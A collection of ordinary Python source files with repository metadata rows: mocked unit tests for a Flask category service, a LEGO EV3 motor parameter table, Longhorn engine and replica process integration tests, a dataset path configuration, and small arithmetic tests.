mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_top_level_permissions(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
g.session = MagicMock()
g.session.user.permissions = ["TEST-PERMISSION"]
response = MagicMock()
response.status_code = 200
response.json.return_value = [
{
"permission": "TEST-PERMISSION",
"display-name": "Test 1",
"name": "test-1"
},
{
"permission": None,
"display-name": "Test 2",
"name": "test-2"
}
]
g.requests.get.return_value = response
response = CategoryService.get_categories()
self.assertEqual(2, len(response))
self.assertEqual("test-1", response[0]['name'])
self.assertEqual("Test 1", response[0]['display'])
self.assertEqual("test-2", response[1]['name'])
self.assertEqual("Test 2", response[1]['display'])
g.requests.get.assert_called_with("{}/categories".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_top_level_error(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
response = MagicMock()
response.status_code = 500
g.requests.get.return_value = response
self.assertRaises(ApplicationError, CategoryService.get_categories)
g.requests.get.assert_called_with("{}/categories".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_category_info(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
response = MagicMock()
response.status_code = 200
response.json.return_value = {
"permission": None,
"display-name": "Test 1",
"name": "test-1",
"sub-categories": [
{"name": "sub name",
"display-name": "sub display",
"permission": None}
],
"statutory-provisions": [
"test stat prov"
],
"instruments": [
"test instrument"
],
"parent": None}
g.requests.get.return_value = response
category = CategoryService.get_category_parent_info("test")
self.assertIsNotNone(category)
self.assertEqual("test-1", category.name)
self.assertEqual("Test 1", category.display_name)
self.assertEqual(1, len(category.sub_categories))
self.assertEqual("sub name", category.sub_categories[0].name)
self.assertEqual("sub display", category.sub_categories[0].display_name)
self.assertEqual(1, len(category.statutory_provisions))
self.assertEqual("test stat prov", category.statutory_provisions[0])
self.assertEqual(1, len(category.instruments))
self.assertEqual("test instrument", category.instruments[0])
self.assertIsNone(category.parent)
g.requests.get.assert_called_with("{}/categories/test".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_category_info_permission_filtered(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
g.session = MagicMock()
g.session.user.permissions = []
response = MagicMock()
response.status_code = 200
response.json.return_value = {
"permission": None,
"display-name": "Test 1",
"name": "test-1",
"sub-categories": [
{"name": "sub name",
"display-name": "sub display",
"permission": "abc"}
],
"statutory-provisions": [
"test stat prov"
],
"instruments": [
"test instrument"
],
"parent": None}
g.requests.get.return_value = response
category = CategoryService.get_category_parent_info("test")
self.assertIsNotNone(category)
self.assertEqual("test-1", category.name)
self.assertEqual("Test 1", category.display_name)
self.assertEqual(0, len(category.sub_categories))
self.assertEqual(1, len(category.statutory_provisions))
self.assertEqual("test stat prov", category.statutory_provisions[0])
self.assertEqual(1, len(category.instruments))
self.assertEqual("test instrument", category.instruments[0])
self.assertIsNone(category.parent)
g.requests.get.assert_called_with("{}/categories/test".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_category_info_permission(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
g.session = MagicMock()
g.session.user.permissions = ["parent-permission", "sub-permission"]
response = MagicMock()
response.status_code = 200
response.json.return_value = {
"permission": "parent-permission",
"display-name": "Test 1",
"name": "test-1",
"sub-categories": [
{"name": "sub name",
"display-name": "sub display",
"permission": "sub-permission"}
],
"statutory-provisions": [
"test stat prov"
],
"instruments": [
"test instrument"
],
"parent": None}
g.requests.get.return_value = response
category = CategoryService.get_category_parent_info("test")
self.assertIsNotNone(category)
self.assertEqual("test-1", category.name)
self.assertEqual("Test 1", category.display_name)
self.assertEqual(1, len(category.sub_categories))
self.assertEqual("sub name", category.sub_categories[0].name)
self.assertEqual("sub display", category.sub_categories[0].display_name)
self.assertEqual(1, len(category.statutory_provisions))
self.assertEqual("test stat prov", category.statutory_provisions[0])
self.assertEqual(1, len(category.instruments))
self.assertEqual("test instrument", category.instruments[0])
g.requests.get.assert_called_with("{}/categories/test".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_category_info_error(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
response = MagicMock()
response.status_code = 500
g.requests.get.return_value = response
self.assertRaises(ApplicationError, CategoryService.get_category_parent_info, "test")
g.requests.get.assert_called_with("{}/categories/test".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_sub_category_info(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
response = MagicMock()
response.status_code = 200
response.json.return_value = {
"permission": None,
"display-name": "Test 1",
"name": "test-1",
"sub-categories": [
{"name": "sub name",
"display-name": "sub display",
"permission": None}
],
"statutory-provisions": [
"test stat prov"
],
"instruments": [
"test instrument"
],
"parent": None}
g.requests.get.return_value = response
category = CategoryService.get_sub_category_info("test", "parent")
self.assertIsNotNone(category)
self.assertEqual("test-1", category.name)
self.assertEqual("Test 1", category.display_name)
self.assertEqual(1, len(category.sub_categories))
self.assertEqual("sub name", category.sub_categories[0].name)
self.assertEqual("sub display", category.sub_categories[0].display_name)
self.assertEqual(1, len(category.statutory_provisions))
self.assertEqual("test stat prov", category.statutory_provisions[0])
self.assertEqual(1, len(category.instruments))
self.assertEqual("test instrument", category.instruments[0])
self.assertIsNone(category.parent)
g.requests.get.assert_called_with("{}/categories/test/sub-categories/parent".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_sub_category_info_permission_filtered(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
g.session = MagicMock()
g.session.user.permissions = []
response = MagicMock()
response.status_code = 200
response.json.return_value = {
"permission": None,
"display-name": "Test 1",
"name": "test-1",
"sub-categories": [
{"name": "sub name",
"display-name": "sub display",
"permission": "abc"}
],
"statutory-provisions": [
"test stat prov"
],
"instruments": [
"test instrument"
],
"parent": None}
g.requests.get.return_value = response
category = CategoryService.get_sub_category_info("test", "abc")
self.assertIsNotNone(category)
self.assertEqual("test-1", category.name)
self.assertEqual("Test 1", category.display_name)
self.assertEqual(0, len(category.sub_categories))
self.assertEqual(1, len(category.statutory_provisions))
self.assertEqual("test stat prov", category.statutory_provisions[0])
self.assertEqual(1, len(category.instruments))
self.assertEqual("test instrument", category.instruments[0])
self.assertIsNone(category.parent)
g.requests.get.assert_called_with("{}/categories/test/sub-categories/abc".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_sub_category_info_permission(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
g.session = MagicMock()
g.session.user.permissions = ["parent-permission", "sub-permission"]
response = MagicMock()
response.status_code = 200
response.json.return_value = {
"permission": "parent-permission",
"display-name": "Test 1",
"name": "test-1",
"sub-categories": [
{"name": "sub name",
"display-name": "sub display",
"permission": "sub-permission"}
],
"statutory-provisions": [
"test stat prov"
],
"instruments": [
"test instrument"
],
"parent": None}
g.requests.get.return_value = response
category = CategoryService.get_sub_category_info("test", "abc")
self.assertIsNotNone(category)
self.assertEqual("test-1", category.name)
self.assertEqual("Test 1", category.display_name)
self.assertEqual(1, len(category.sub_categories))
self.assertEqual("sub name", category.sub_categories[0].name)
self.assertEqual("sub display", category.sub_categories[0].display_name)
self.assertEqual(1, len(category.statutory_provisions))
self.assertEqual("test stat prov", category.statutory_provisions[0])
self.assertEqual(1, len(category.instruments))
self.assertEqual("test instrument", category.instruments[0])
g.requests.get.assert_called_with("{}/categories/test/sub-categories/abc".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_sub_category_info_error(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
response = MagicMock()
response.status_code = 500
g.requests.get.return_value = response
self.assertRaises(ApplicationError, CategoryService.get_sub_category_info, "test", "abc")
g.requests.get.assert_called_with("{}/categories/test/sub-categories/abc".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_all_stat_provs(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
response = MagicMock()
response.status_code = 200
response.json.return_value = ["test stat prov"]
g.requests.get.return_value = response
stat_provs = CategoryService.get_all_stat_provs()
self.assertIsNotNone(stat_provs)
self.assertEqual(1, len(stat_provs))
self.assertEqual("test stat prov", stat_provs[0])
g.requests.get.assert_called_with("{}/statutory-provisions".format('abc'),
params={'selectable': True})
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_all_stat_provs_error(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
response = MagicMock()
response.status_code = 500
g.requests.get.return_value = response
self.assertRaises(ApplicationError, CategoryService.get_all_stat_provs)
g.requests.get.assert_called_with("{}/statutory-provisions".format('abc'),
params={'selectable': True})
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_all_instruments(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
response = MagicMock()
response.status_code = 200
response.json.return_value = ["test instrument"]
g.requests.get.return_value = response
instruments = CategoryService.get_all_instruments()
self.assertIsNotNone(instruments)
self.assertEqual(1, len(instruments))
self.assertEqual("test instrument", instruments[0])
g.requests.get.assert_called_with("abc/instruments")
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_all_instruments_error(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
response = MagicMock()
response.status_code = 500
g.requests.get.return_value = response
self.assertRaises(ApplicationError, CategoryService.get_all_instruments)
g.requests.get.assert_called_with("{}/instruments".format('abc'))
mock_current_app.logger.info.assert_called()
| 43.924335 | 103 | 0.599376 | 2,132 | 21,479 | 5.825516 | 0.0394 | 0.080918 | 0.055072 | 0.095652 | 0.953865 | 0.944042 | 0.926087 | 0.924235 | 0.921014 | 0.917391 | 0 | 0.009739 | 0.287676 | 21,479 | 488 | 104 | 44.014344 | 0.802026 | 0 | 0 | 0.842995 | 0 | 0 | 0.213138 | 0.111225 | 0 | 0 | 0 | 0 | 0.280193 | 1 | 0.041063 | false | 0 | 0.016908 | 0 | 0.060386 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
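
Every test above repeats one mocking pattern: patch module globals, hand the code a MagicMock in place of g.requests, then assert on the recorded call. A standalone distillation of that shape (the fetch helper and the "abc" URL are illustrative, not code from the project):

from unittest.mock import MagicMock

def fetch_categories(requests, base_url):
    # Mirrors CategoryService: GET the categories endpoint, return its JSON.
    return requests.get("{}/categories".format(base_url)).json()

requests = MagicMock()
requests.get.return_value.json.return_value = [{"name": "test-1"}]
assert fetch_categories(requests, "abc") == [{"name": "test-1"}]
requests.get.assert_called_with("abc/categories")
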
82b69e2e97da66f932b8c25052ca3961aa80e76e | 2,428 | py | Python | tests/motor/motor_info.py | alex93p/ev3dev-robopy | 4f7b37e78387dc7b0da9ca196154351e821bd628 | [
"MIT"
] | 1 | 2019-12-18T03:42:56.000Z | 2019-12-18T03:42:56.000Z | tests/motor/motor_info.py | alex93p/ev3dev-robopy | 4f7b37e78387dc7b0da9ca196154351e821bd628 | [
"MIT"
] | null | null | null | tests/motor/motor_info.py | alex93p/ev3dev-robopy | 4f7b37e78387dc7b0da9ca196154351e821bd628 | [
"MIT"
] | null | null | null | motor_info = {
'lego-ev3-l-motor': {'motion_type': 'rotation',
'count_per_rot': 360,
'max_speed': 1050,
'position_p': 80000,
'position_i': 0,
'position_d': 0,
'polarity': 'normal',
'speed_p': 1000,
'speed_i': 60,
'speed_d': 0 },
'lego-ev3-m-motor': {'motion_type': 'rotation',
'count_per_rot': 360,
'max_speed': 1560,
'position_p': 160000,
'position_i': 0,
'position_d': 0,
'polarity': 'normal',
'speed_p': 1000,
'speed_i': 60,
'speed_d': 0 },
'lego-nxt-motor': {'motion_type': 'rotation',
'count_per_rot': 360,
'max_speed': 1020,
'position_p': 80000,
'position_i': 0,
'position_d': 0,
'polarity': 'normal',
'speed_p': 1000,
'speed_i': 60,
'speed_d': 0 },
'fi-l12-ev3-50': {'motion_type': 'linear',
'count_per_m': 2000,
'full_travel_count': 100,
'max_speed': 24,
'position_p': 40000,
'position_i': 0,
'position_d': 0,
'polarity': 'normal',
'speed_p': 1000,
'speed_i': 60,
'speed_d': 0,
},
'fi-l12-ev3-100': {'motion_type': 'linear',
'count_per_m': 2000,
'full_travel_count': 200,
'max_speed': 24,
'position_p': 40000,
'position_i': 0,
'position_d': 0,
'polarity': 'normal',
'speed_p': 1000,
'speed_i': 60,
'speed_d': 0,
}
}
| 42.596491 | 52 | 0.302718 | 179 | 2,428 | 3.798883 | 0.22905 | 0.029412 | 0.073529 | 0.132353 | 0.908824 | 0.908824 | 0.908824 | 0.908824 | 0.908824 | 0.908824 | 0 | 0.122266 | 0.585667 | 2,428 | 56 | 53 | 43.357143 | 0.553678 | 0 | 0 | 0.732143 | 0 | 0 | 0.259061 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
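
Example lookups against the table above (plain dictionary access; the halving heuristic is just for illustration):

speed = motor_info['lego-ev3-l-motor']['max_speed']  # 1050
half_speed = speed // 2  # a conservative target of 525
assert motor_info['fi-l12-ev3-50']['motion_type'] == 'linear'
assert motor_info['lego-nxt-motor']['count_per_rot'] == 360
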
7d5c1d351f244710ac092766bee791fc77f94018 | 9,832 | py | Python | integration/instance/test_launcher_basic.py | Frankkkkk/longhorn-engine | ebc22c7abacbd960afae6693a9378c60fd0616cf | [
"Apache-2.0"
] | 1 | 2022-01-03T09:19:59.000Z | 2022-01-03T09:19:59.000Z | integration/instance/test_launcher_basic.py | Frankkkkk/longhorn-engine | ebc22c7abacbd960afae6693a9378c60fd0616cf | [
"Apache-2.0"
] | null | null | null | integration/instance/test_launcher_basic.py | Frankkkkk/longhorn-engine | ebc22c7abacbd960afae6693a9378c60fd0616cf | [
"Apache-2.0"
] | null | null | null | import tempfile
import pytest
from common.core import (
create_replica_process, create_engine_process,
delete_process,
wait_for_process_running, wait_for_process_error,
wait_for_process_deletion,
check_dev_existence, wait_for_dev_deletion,
upgrade_engine,
)
from common.constants import (
LONGHORN_UPGRADE_BINARY, SIZE,
PROC_STATE_RUNNING, PROC_STATE_STOPPING, PROC_STATE_STOPPED,
PROC_STATE_ERROR,
VOLUME_NAME_BASE, ENGINE_NAME_BASE, REPLICA_NAME_BASE,
)
from common.cli import ( # NOQA
em_client, pm_client, # NOQA
)
def test_start_stop_replicas(pm_client): # NOQA
rs = pm_client.process_list()
assert len(rs) == 0
for i in range(10):
tmp_dir = tempfile.mkdtemp()
name = REPLICA_NAME_BASE + str(i)
r = create_replica_process(pm_client, name=name, replica_dir=tmp_dir)
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
r = pm_client.process_get(name=name)
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
rs = pm_client.process_list()
assert len(rs) == (i+1)
assert name in rs
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
for i in range(10):
rs = pm_client.process_list()
assert len(rs) == (10-i)
name = REPLICA_NAME_BASE + str(i)
r = pm_client.process_delete(name=name)
assert r.spec.name == name
assert r.status.state in (PROC_STATE_STOPPING,
PROC_STATE_STOPPED)
wait_for_process_deletion(pm_client, name)
rs = pm_client.process_list()
assert len(rs) == (9-i)
rs = pm_client.process_list()
assert len(rs) == 0
def test_process_creation_failure(pm_client): # NOQA
rs = pm_client.process_list()
assert len(rs) == 0
count = 5
for i in range(count):
tmp_dir = tempfile.mkdtemp()
name = REPLICA_NAME_BASE + str(i)
args = ["replica", tmp_dir, "--size", str(SIZE)]
pm_client.process_create(
name=name, binary="/opt/non-existing-binary", args=args,
port_count=15, port_args=["--listen,localhost:"])
wait_for_process_error(pm_client, name)
r = pm_client.process_get(name=name)
assert r.spec.name == name
assert r.status.state == PROC_STATE_ERROR
assert "no such file or directory" in r.status.error_msg
for i in range(count):
rs = pm_client.process_list()
assert len(rs) == (count-i)
name = REPLICA_NAME_BASE + str(i)
pm_client.process_delete(name=name)
wait_for_process_deletion(pm_client, name)
rs = pm_client.process_list()
assert len(rs) == (count-1-i)
rs = pm_client.process_list()
assert len(rs) == 0
def test_one_volume(pm_client, em_client): # NOQA
rs = pm_client.process_list()
assert len(rs) == 0
replica_args = []
for i in range(3):
tmp_dir = tempfile.mkdtemp()
name = REPLICA_NAME_BASE + str(i)
r = create_replica_process(pm_client, name=name, replica_dir=tmp_dir)
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
r = pm_client.process_get(name=name)
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
rs = pm_client.process_list()
assert len(rs) == (i+1)
assert name in rs
assert r.spec.name == name
assert r.status.state == PROC_STATE_RUNNING
replica_args.append("tcp://localhost:"+str(r.status.port_start))
engine_name = ENGINE_NAME_BASE + "0"
volume_name = VOLUME_NAME_BASE + "0"
e = create_engine_process(em_client, name=engine_name,
volume_name=volume_name,
replicas=replica_args)
assert e.spec.name == engine_name
check_dev_existence(volume_name)
es = em_client.process_list()
assert len(es) == 1
assert engine_name in es
e = es[engine_name]
assert e.spec.name == engine_name
assert e.status.state == PROC_STATE_RUNNING
ps = pm_client.process_list()
assert len(ps) == 3
delete_process(em_client, engine_name)
# test duplicate call
delete_process(em_client, engine_name)
wait_for_process_deletion(em_client, engine_name)
# test duplicate call
delete_process(em_client, engine_name)
ps = pm_client.process_list()
assert len(ps) == 3
for i in range(3):
name = REPLICA_NAME_BASE + str(i)
r = pm_client.process_delete(name=name)
assert r.spec.name == name
assert r.status.state in (PROC_STATE_STOPPING,
PROC_STATE_STOPPED)
wait_for_process_deletion(pm_client, name)
ps = pm_client.process_list()
assert len(ps) == 0
def test_multiple_volumes(pm_client, em_client): # NOQA
rs = pm_client.process_list()
assert len(rs) == 0
cnt = 5
for i in range(cnt):
replica_args = []
tmp_dir = tempfile.mkdtemp()
replica_name = REPLICA_NAME_BASE + str(i)
r = create_replica_process(pm_client,
name=replica_name, replica_dir=tmp_dir)
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
r = pm_client.process_get(name=replica_name)
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
rs = pm_client.process_list()
assert len(rs) == i+1
assert replica_name in rs
r = rs[replica_name]
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
replica_args.append("tcp://localhost:"+str(r.status.port_start))
engine_name = ENGINE_NAME_BASE + str(i)
volume_name = VOLUME_NAME_BASE + str(i)
e = create_engine_process(em_client, name=engine_name,
volume_name=volume_name,
replicas=replica_args)
assert e.spec.name == engine_name
check_dev_existence(volume_name)
es = em_client.process_list()
assert len(es) == i+1
assert engine_name in es
e = es[engine_name]
assert e.spec.name == engine_name
assert e.status.state == PROC_STATE_RUNNING
ps = pm_client.process_list()
assert len(ps) == i+1
for i in range(cnt):
engine_name = ENGINE_NAME_BASE + str(i)
volume_name = VOLUME_NAME_BASE + str(i)
delete_process(em_client, engine_name)
wait_for_process_deletion(em_client, engine_name)
wait_for_dev_deletion(volume_name)
es = em_client.process_list()
assert len(es) == (cnt-1-i)
assert engine_name not in es
@pytest.mark.skip(reason="debug")
def test_engine_upgrade(pm_client, em_client): # NOQA
rs = pm_client.process_list()
assert len(rs) == 0
dir_base = "/tmp/replica"
cnt = 3
for i in range(cnt):
replica_args = []
dir = dir_base + str(i)
replica_name = REPLICA_NAME_BASE + str(i)
r = create_replica_process(pm_client, name=replica_name,
replica_dir=dir)
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
r = pm_client.process_get(name=replica_name)
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
rs = pm_client.process_list()
assert len(rs) == i+1
assert replica_name in rs
r = rs[replica_name]
assert r.spec.name == replica_name
assert r.status.state == PROC_STATE_RUNNING
replica_args.append("tcp://localhost:"+str(r.status.port_start))
engine_name = ENGINE_NAME_BASE + str(i)
volume_name = VOLUME_NAME_BASE + str(i)
e = create_engine_process(em_client, name=engine_name,
volume_name=volume_name,
replicas=replica_args)
assert e.spec.name == engine_name
check_dev_existence(volume_name)
es = em_client.process_list()
assert len(es) == i+1
assert engine_name in es
e = es[engine_name]
assert e.spec.name == engine_name
assert e.status.state == PROC_STATE_RUNNING
dir = dir_base + "0"
engine_name = ENGINE_NAME_BASE + "0"
replica_name = REPLICA_NAME_BASE + "0"
volume_name = VOLUME_NAME_BASE + "0"
replica_name_upgrade = REPLICA_NAME_BASE + "0-upgrade"
r = create_replica_process(pm_client, name=replica_name_upgrade,
binary=LONGHORN_UPGRADE_BINARY,
replica_dir=dir)
assert r.spec.name == replica_name_upgrade
assert r.status.state == PROC_STATE_RUNNING
replicas = ["tcp://localhost:"+str(r.status.port_start)]
e = upgrade_engine(em_client, LONGHORN_UPGRADE_BINARY,
engine_name, volume_name, replicas)
assert e.spec.name == engine_name
check_dev_existence(volume_name)
r = pm_client.process_delete(name=replica_name)
assert r.spec.name == replica_name
assert r.status.state in (PROC_STATE_STOPPING,
PROC_STATE_STOPPED)
wait_for_process_deletion(pm_client, replica_name)
check_dev_existence(volume_name)
wait_for_process_running(em_client, engine_name)
es = em_client.process_list()
assert engine_name in es
e = es[engine_name]
assert e.spec.name == engine_name
assert e.status.state == PROC_STATE_RUNNING
delete_process(em_client, engine_name)
wait_for_process_deletion(em_client, engine_name)
wait_for_dev_deletion(volume_name)
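# Condensed lifecycle sketch (illustrative only, distilled from the tests
# above; it reuses helpers already imported in this module, and the "0"
# suffix is arbitrary): start a replica, attach an engine, tear both down.
def _lifecycle_sketch(pm_client, em_client):
    tmp_dir = tempfile.mkdtemp()
    r = create_replica_process(pm_client, name=REPLICA_NAME_BASE + "0",
                               replica_dir=tmp_dir)
    replicas = ["tcp://localhost:" + str(r.status.port_start)]
    create_engine_process(em_client, name=ENGINE_NAME_BASE + "0",
                          volume_name=VOLUME_NAME_BASE + "0",
                          replicas=replicas)
    check_dev_existence(VOLUME_NAME_BASE + "0")
    delete_process(em_client, ENGINE_NAME_BASE + "0")  # idempotent, see above
    wait_for_process_deletion(em_client, ENGINE_NAME_BASE + "0")
    pm_client.process_delete(name=REPLICA_NAME_BASE + "0")
    wait_for_process_deletion(pm_client, REPLICA_NAME_BASE + "0")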
| 31.412141 | 77 | 0.636391 | 1,344 | 9,832 | 4.344494 | 0.070685 | 0.061654 | 0.074499 | 0.094537 | 0.827196 | 0.80459 | 0.778387 | 0.750128 | 0.744648 | 0.701147 | 0 | 0.005725 | 0.271562 | 9,832 | 312 | 78 | 31.512821 | 0.80955 | 0.007526 | 0 | 0.738397 | 0 | 0 | 0.018158 | 0.002462 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.021097 | false | 0 | 0.021097 | 0 | 0.042194 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7d6829b0f35065a2bdf176fd5c309745f7854184 | 777 | py | Python | opt.py | marcelsan/Deep-HdrReconstruction | 7cb0d93938baa6fbe029116451a661c18dfba49e | [
"BSD-3-Clause"
] | 80 | 2020-10-01T17:04:18.000Z | 2022-03-26T01:05:43.000Z | opt.py | marcelsan/Deep-HdrReconstruction | 7cb0d93938baa6fbe029116451a661c18dfba49e | [
"BSD-3-Clause"
] | null | null | null | opt.py | marcelsan/Deep-HdrReconstruction | 7cb0d93938baa6fbe029116451a661c18dfba49e | [
"BSD-3-Clause"
] | 17 | 2020-10-26T08:00:16.000Z | 2022-02-22T12:26:32.000Z | # Data default directories
# # Places HDR dataset
# TRAIN_IMAGES_DIR = '/media/marcelsantos/8e46ec36-35a2-4e28-824b-aea17a5c04c1/places-pretrain/train'
# VAL_IMAGES_DIR = '/media/marcelsantos/8e46ec36-35a2-4e28-824b-aea17a5c04c1/places-pretrain/trainval'
# HDR dataset
TRAIN_IMAGES_DIR = '/media/marcelsantos/8e46ec36-35a2-4e28-824b-aea17a5c04c1/hdr_images/train'
VAL_IMAGES_DIR = '/media/marcelsantos/8e46ec36-35a2-4e28-824b-aea17a5c04c1/hdr_images/trainval'
# Places inpainting dataset
# TRAIN_IMAGES_DIR = '/media/marcelsantos/26e14ba1-f2a1-4b9d-8b61-0b91b1c39c07/imagesPlaces205_resize/train'
# VAL_IMAGES_DIR = '/media/marcelsantos/26e14ba1-f2a1-4b9d-8b61-0b91b1c39c07/imagesPlaces205_resize/trainval'
# Mean/Std
MEAN = [0.485, 0.456, 0.406]
STD = [0.229, 0.224, 0.225] | 48.5625 | 109 | 0.803089 | 105 | 777 | 5.790476 | 0.342857 | 0.088816 | 0.138158 | 0.256579 | 0.825658 | 0.825658 | 0.792763 | 0.792763 | 0.792763 | 0.792763 | 0 | 0.206897 | 0.066924 | 777 | 16 | 110 | 48.5625 | 0.631724 | 0.65251 | 0 | 0 | 0 | 0 | 0.573077 | 0.573077 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
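The MEAN/STD constants above are the standard ImageNet channel statistics. A minimal sketch of how a training pipeline might consume them, assuming torchvision is the consumer and opt.py is importable (neither is shown in this file):

import torchvision.transforms as T
from opt import MEAN, STD

# Per-channel normalization: (x - mean) / std, applied after ToTensor
# scales pixel values into [0, 1]
preprocess = T.Compose([
    T.ToTensor(),
    T.Normalize(mean=MEAN, std=STD),
])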
7d73ac769e15c9c7757389ca3f03ea4aa39ac48a | 300 | py | Python | test_core.py | QuentinAndre11/lecture-spring-2021 | 2f2b563e91ea6e18fe6cd3e9087f2fd0b2e2beee | [
"Apache-2.0"
] | null | null | null | test_core.py | QuentinAndre11/lecture-spring-2021 | 2f2b563e91ea6e18fe6cd3e9087f2fd0b2e2beee | [
"Apache-2.0"
] | null | null | null | test_core.py | QuentinAndre11/lecture-spring-2021 | 2f2b563e91ea6e18fe6cd3e9087f2fd0b2e2beee | [
"Apache-2.0"
] | null | null | null | from core import *
def test_add():
"""Check that `add()` works as expected"""
assert add(2, 3) == 5
def test_add_z():
"""Check that `add()` works as expected"""
assert add(2, 3, 1) == 6
def test_add_2():
"""Check that `add()` works as expected"""
